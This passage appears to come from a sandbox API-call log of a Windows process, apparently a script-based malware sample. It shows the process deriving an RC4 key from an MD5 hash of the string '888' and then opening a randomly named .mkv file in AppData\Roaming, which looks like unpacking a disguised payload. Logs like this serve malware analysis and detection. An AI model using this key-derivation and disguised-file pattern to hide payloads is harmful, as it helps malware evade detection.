lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.404] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0149.404] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.404] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.405] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.405] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.405] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.406] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0149.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0149.406] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.406] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.406] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0149.406] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.406] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0149.406] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0149.406] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0149.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fa0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0149.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0149.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ee0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0149.406] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf000) returned 1 [0149.407] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.407] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.407] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0149.407] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.407] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0149.407] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.407] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.407] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.407] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.407] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.407] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.407] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.408] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.408] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.408] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.408] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.408] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.408] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.408] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.408] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.408] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.408] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0149.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.408] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0149.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.408] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.408] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.408] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.408] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.408] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.408] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.409] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.409] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.409] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.409] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.409] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.409] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.409] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.409] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.409] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.409] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.409] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.409] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.409] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.409] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.409] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.409] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.409] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.409] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.409] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.409] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.409] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.410] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.410] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa300, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0149.410] CryptCreateHash (in: hProv=0x9bf000, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0149.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0149.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0149.410] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0149.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0149.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719b8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0149.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.410] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.410] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.410] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.410] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.410] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0149.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa3c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0149.411] CryptHashData (hHash=0x9e1fb8, pbData=0x2a72698, dwDataLen=0x3, dwFlags=0x1) returned 1 [0149.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.411] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.411] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.411] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.411] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.411] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.411] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.411] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.411] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.411] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.411] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0149.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa420, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0149.411] CryptDeriveKey (in: hProv=0x9bf000, Algid=0x6601, hBaseData=0x9e1fb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1d38) returned 1 [0149.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.412] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.412] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0149.412] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.412] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0149.412] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0149.412] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0149.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7180, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0149.412] CryptDestroyHash (hHash=0x9e1fb8) returned 1 [0149.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.413] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/NWn0_eXN3pgA63Ym.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nwn0_exn3pga63ym.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0149.413] SetFilePointerEx (in: hFile=0x4fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.413] SetFilePointerEx (in: hFile=0x4fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 